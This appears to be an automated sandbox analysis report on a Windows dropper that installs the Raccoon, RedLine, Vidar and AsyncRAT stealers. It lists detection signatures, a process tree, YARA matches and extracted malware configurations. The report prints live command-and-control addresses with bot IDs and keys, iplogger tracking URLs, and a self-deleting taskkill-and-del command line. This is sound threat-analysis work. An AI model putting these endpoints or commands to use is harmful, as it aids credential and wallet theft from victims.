Edit tour

Windows Analysis Report
9n6ctoq7cn.exe

Overview

General Information

Sample Name:	9n6ctoq7cn.exe
Analysis ID:	688970
MD5:	1d1c4639ec7bd10badd41968bc0ff797
SHA1:	ab1146f9ac9bbe1580be4f16c1548a2600075ba9
SHA256:	bdbd5a0fb6a3ab99f0cfa3cee7e3f7f8f7ec078eeb628aadfb8a32a5df2be3b9
Tags:	exeRecordBreaker
Infos:

Detection

AsyncRAT, CryptOne, Raccoon Stealer v2, RedLine, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Detected unpacking (overwrites its own PE header)

Yara detected CryptOne packer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Yara detected AsyncRAT

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Snort IDS alert for network traffic

Yara detected Raccoon Stealer v2

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Vidar stealer

Yara detected MSILDownloaderGeneric

Multi AV Scanner detection for dropped file

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected Generic Downloader

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Binary contains a suspicious time stamp

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Uses taskkill to terminate processes

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

9n6ctoq7cn.exe (PID: 5608 cmdline: "C:\Users\user\Desktop\9n6ctoq7cn.exe" MD5: 1D1C4639EC7BD10BADD41968BC0FF797)

chrome.exe (PID: 5968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1764,i,5049003172737788079,9933990258690121853,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 4584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7024 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6528 --field-trial-handle=1828,i,5377899597714996993,7284956991832301361,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 4648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,1988256029535633376,615853278931345674,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1828 --field-trial-handle=1808,i,2619368305235177812,9685674490899924791,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 6492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=1808,i,12731814554735541846,5595601299034578970,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1816,i,10953678208131355352,362896463253549175,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 7564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1768,i,9353750905984569281,2492682509794733046,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 8424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1812,i,7141586697906360246,11009401238799386770,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

F0geI.exe (PID: 8148 cmdline: "C:\Program Files (x86)\Company\NewProduct\F0geI.exe" MD5: 501E0F6FA90340E3D7FF26F276CD582E)

kukurzka9000.exe (PID: 4560 cmdline: "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe" MD5: 3EC059BD19D6655BA83AE1E644B80510)

namdoitntn.exe (PID: 8632 cmdline: "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe" MD5: BBD8EA73B7626E0CA5B91D355DF39B7F)

real.exe (PID: 8684 cmdline: "C:\Program Files (x86)\Company\NewProduct\real.exe" MD5: E0C8728412F5F7E97698C72DA925C5E6)

cmd.exe (PID: 1260 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 1400 cmdline: taskkill /im real.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

timeout.exe (PID: 1172 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

safert44.exe (PID: 8784 cmdline: "C:\Program Files (x86)\Company\NewProduct\safert44.exe" MD5: 414FFD7094C0F50662FFA508CA43B7D0)

jshainx.exe (PID: 8908 cmdline: "C:\Program Files (x86)\Company\NewProduct\jshainx.exe" MD5: 2647A5BE31A41A39BF2497125018DBCE)

brokerius.exe (PID: 8968 cmdline: "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" MD5: F5D13E361F8B9ACA7103CB46B441034B)

cmd.exe (PID: 5900 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 7816 cmdline: taskkill /im brokerius.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

timeout.exe (PID: 6944 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

captain09876.exe (PID: 9044 cmdline: "C:\Program Files (x86)\Company\NewProduct\captain09876.exe" MD5: CE94CE7DE8279ECF9519B12F124543C3)

SETUP_~1.EXE (PID: 7912 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE MD5: CE25658AC9291C713590B834D96406BB)

ordo_sec666.exe (PID: 9092 cmdline: "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe" MD5: 63FD052610279F9EB9F1FEE8E262F2A4)

me.exe (PID: 9172 cmdline: "C:\Program Files (x86)\Company\NewProduct\me.exe" MD5: 21C43007B3C14564CF459791F86DA430)

rundll32.exe (PID: 6724 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://45.95.11.158/"], "Bot ID": "76426c3f362f5a47a469f0e9d8bc3eef", "RC4_key1": "76426c3f362f5a47a469f0e9d8bc3eef"}

Threatname: RedLine

{"C2 url": ["103.89.90.61:34589"], "Bot Id": "nam3", "Message": "Done", "Authorization Header": "64b900120bbceaa6a9c60e9079492895"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files (x86)\Company\NewProduct\me.exe	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38f14:$a2: wallet.dat 0x393a1:$b1: CC\%s_%s.txt 0x390a5:$b2: History\%s_%s.txt 0x39091:$b3: Autofill\%s_%s.txt
C:\Program Files (x86)\Company\NewProduct\real.exe	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x39138:$a2: wallet.dat 0x395c1:$b1: CC\%s_%s.txt 0x392c9:$b2: History\%s_%s.txt 0x392b5:$b3: Autofill\%s_%s.txt
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19ca8:$pat14: , CommandLine: 0x12ccd:$v2_1: ListOfProcesses 0x12a8d:$v4_3: base64str 0x136d1:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12964:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11eab:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13703:$a1: get_encrypted_key 0x12dfc:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13006:$a4: GetBrowsers 0x19a38:$a5: Software\Valve\SteamLogin Data 0x192d8:$a6: %appdata%\ 0x12b21:$a7: ScanPasswords
C:\Program Files (x86)\Company\NewProduct\safert44.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1c60:$pat14: , CommandLine: 0x25b6b:$v2_1: ListOfProcesses 0x25920:$v4_3: base64str 0x265de:$v4_4: stringKey 0x23fa6:$v4_5: BytesToStringConverted 0x23080:$v4_6: FromBase64 0x24537:$v4_8: procName 0x24867:$v5_1: DownloadAndExecuteUpdate 0x257f7:$v5_2: ITaskProcessor 0x24855:$v5_3: CommandLineUpdate 0x24846:$v5_4: DownloadUpdate 0x24cbd:$v5_5: FileScanning 0x241cd:$v5_7: RecordHeaderField 0x23e0e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Program Files (x86)\Company\NewProduct\safert44.exe	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x26610:$a1: get_encrypted_key 0x25cb8:$a2: get_PassedPaths 0x245af:$a3: ChromeGetLocalName 0x25ec9:$a4: GetBrowsers 0x19f0:$a5: Software\Valve\SteamLogin Data 0x1290:$a6: %appdata%\ 0x259b4:$a7: ScanPasswords
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000003.404710161.000000000062F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000000F.00000002.469595430.000000000062B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000001D.00000000.406600715.0000000000D23000.00000002.00000001.01000000.00000012.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b14:$a2: wallet.dat 0x6fa1:$b1: CC\%s_%s.txt 0x6ca5:$b2: History\%s_%s.txt 0x6c91:$b3: Autofill\%s_%s.txt
00000017.00000000.382727535.0000000000104000.00000002.00000001.01000000.0000000A.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b38:$a2: wallet.dat 0x6fc1:$b1: CC\%s_%s.txt 0x6cc9:$b2: History\%s_%s.txt 0x6cb5:$b3: Autofill\%s_%s.txt
0000001D.00000002.689715508.00000000009FA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.380590227.0000000000633000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000000F.00000003.405187438.000000000062F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000000F.00000003.422956483.000000000062A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000003.301588372.0000000002990000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0xb5f28:$a2: wallet.dat 0xb63b5:$b1: CC\%s_%s.txt 0xb60b9:$b2: History\%s_%s.txt 0xb60a5:$b3: Autofill\%s_%s.txt
00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.460179149.0000000000104000.00000002.00000001.01000000.0000000A.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b38:$a2: wallet.dat 0x6fc1:$b1: CC\%s_%s.txt 0x6cc9:$b2: History\%s_%s.txt 0x6cb5:$b3: Autofill\%s_%s.txt
00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x2303:$a1: get_encrypted_key 0x19fc:$a2: get_PassedPaths 0x42a:$a3: ChromeGetLocalName 0x1c06:$a4: GetBrowsers 0x8638:$a5: Software\Valve\SteamLogin Data 0x7ed8:$a6: %appdata%\ 0x1721:$a7: ScanPasswords
0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000F.00000003.362320547.0000000002090000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000018.00000000.386223308.0000000000FA2000.00000002.00000001.01000000.0000000B.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x26410:$a1: get_encrypted_key 0x25ab8:$a2: get_PassedPaths 0x243af:$a3: ChromeGetLocalName 0x25cc9:$a4: GetBrowsers 0x17f0:$a5: Software\Valve\SteamLogin Data 0x1090:$a6: %appdata%\ 0x257b4:$a7: ScanPasswords
0000000F.00000002.466370308.00000000005F8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x4705:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000018.00000002.746495285.00000000036B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.641024650.000000000111A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000001A.00000000.395822008.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b38:$a2: wallet.dat 0x6fc1:$b1: CC\%s_%s.txt 0x6cc9:$b2: History\%s_%s.txt 0x6cb5:$b3: Autofill\%s_%s.txt
00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.400767389.000000000062E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000000F.00000003.402599469.000000000062F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000000F.00000003.386373584.0000000000631000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000001D.00000002.693545020.0000000000D23000.00000002.00000001.01000000.00000012.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b14:$a2: wallet.dat 0x6fa1:$b1: CC\%s_%s.txt 0x6ca5:$b2: History\%s_%s.txt 0x6c91:$b3: Autofill\%s_%s.txt
0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0000000F.00000003.403718026.000000000062F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13301:$a1: get_encrypted_key 0x12a03:$a2: get_PassedPaths 0x1142a:$a3: ChromeGetLocalName 0x12c04:$a4: GetBrowsers 0x19628:$a5: Software\Valve\SteamLogin Data 0x18ec8:$a6: %appdata%\ 0x12728:$a7: ScanPasswords
0000001A.00000002.637138430.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6b38:$a2: wallet.dat 0x6fc1:$b1: CC\%s_%s.txt 0x6cc9:$b2: History\%s_%s.txt 0x6cb5:$b3: Autofill\%s_%s.txt
00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000003.455099291.00000000023BA000.00000040.00000800.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6e:$xo1: _cbx+{ydlyjf+hjeed\x7F+in+y~e+be+ODX+fdon
00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: namdoitntn.exe PID: 8632	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: namdoitntn.exe PID: 8632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: real.exe PID: 8684	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: real.exe PID: 8684	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: real.exe PID: 8684	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x6275e:$a1: BinanceChainWallet 0x7b7b:$a2: wallet.dat 0x21bf8:$a2: wallet.dat 0x61f4a:$a3: SOFTWARE\monero-project\monero-core 0x852a:$b1: CC\%s_%s.txt 0x8563:$b1: CC\%s_%s.txt 0x225a7:$b1: CC\%s_%s.txt 0x225e0:$b1: CC\%s_%s.txt 0x81f3:$b2: History\%s_%s.txt 0x8333:$b2: History\%s_%s.txt 0x22270:$b2: History\%s_%s.txt 0x223b0:$b2: History\%s_%s.txt 0x81df:$b3: Autofill\%s_%s.txt 0x8320:$b3: Autofill\%s_%s.txt 0x2225c:$b3: Autofill\%s_%s.txt 0x2239d:$b3: Autofill\%s_%s.txt
Process Memory Space: safert44.exe PID: 8784	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: safert44.exe PID: 8784	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jshainx.exe PID: 8908	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: jshainx.exe PID: 8908	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: brokerius.exe PID: 8968	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: brokerius.exe PID: 8968	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x155308:$a2: wallet.dat 0x18e5fc:$a2: wallet.dat 0x155cb5:$b1: CC\%s_%s.txt 0x155cee:$b1: CC\%s_%s.txt 0x18efa9:$b1: CC\%s_%s.txt 0x18efe2:$b1: CC\%s_%s.txt 0x15597e:$b2: History\%s_%s.txt 0x155abe:$b2: History\%s_%s.txt 0x18ec72:$b2: History\%s_%s.txt 0x18edb2:$b2: History\%s_%s.txt 0x15596a:$b3: Autofill\%s_%s.txt 0x155aab:$b3: Autofill\%s_%s.txt 0x18ec5e:$b3: Autofill\%s_%s.txt 0x18ed9f:$b3: Autofill\%s_%s.txt
Process Memory Space: me.exe PID: 9172	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x724b:$a2: wallet.dat 0x57b9a:$a2: wallet.dat 0x7bdd:$b1: CC\%s_%s.txt 0x7c16:$b1: CC\%s_%s.txt 0x5852c:$b1: CC\%s_%s.txt 0x58565:$b1: CC\%s_%s.txt 0x78a7:$b2: History\%s_%s.txt 0x79e7:$b2: History\%s_%s.txt 0x581f6:$b2: History\%s_%s.txt 0x58336:$b2: History\%s_%s.txt 0x7893:$b3: Autofill\%s_%s.txt 0x79d4:$b3: Autofill\%s_%s.txt 0x581e2:$b3: Autofill\%s_%s.txt 0x58323:$b3: Autofill\%s_%s.txt
Process Memory Space: SETUP_~1.EXE PID: 7912	JoeSecurity_MSIL_Downloader_Generic	Yara detected MSIL_Downloader_Generic	Joe Security
Process Memory Space: SETUP_~1.EXE PID: 7912	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Click to see the 50 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.2.F0geI.exe.2080e67.4.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
18.2.kukurzka9000.exe.22b0174.1.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
18.2.kukurzka9000.exe.400000.0.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
18.2.kukurzka9000.exe.22b0174.1.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
21.0.namdoitntn.exe.9f0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
21.0.namdoitntn.exe.9f0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
21.0.namdoitntn.exe.9f0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19c98:$pat14: , CommandLine: 0x12cd4:$v2_1: ListOfProcesses 0x12a94:$v4_3: base64str 0x136cf:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x1296b:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11eaa:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
